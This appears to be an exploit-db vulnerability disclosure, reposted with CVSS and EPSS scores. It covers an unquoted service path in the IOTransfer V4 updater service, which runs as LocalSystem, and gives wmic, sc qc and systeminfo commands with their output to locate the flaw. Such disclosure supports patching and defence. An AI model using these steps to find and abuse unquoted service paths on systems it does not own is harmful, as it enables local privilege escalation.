IOTransfer V4 - Unquoted Service Path

2022-11-1100:00:00

BLAY ABU SAFIAN

www.exploit-db.com

iotransfer v4

unquoted service path

microsoft windows server 2019

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.1 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.6%

JSON

# Exploit Title: IOTransfer V4 - Unquoted Service Path
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Discovery Date: 2022-28-07
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: https://iotransfer.itopvpn.com/download/
# Tested Version: V4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197
# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
                      Auto

C:\>sc qc IOTUpdaterSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IOTUpdaterSvc
        TYPE : 10 WIN32_OWN_PROCESS
        START_TYPE : 2 AUTO_START
        ERROR_CONTROL : 1 NORMAL
        BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe


LOAD_ORDER_GROUP :
        TAG : 0
        DISPLAY_NAME : IOTransfer Updater
        DEPENDENCIES :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation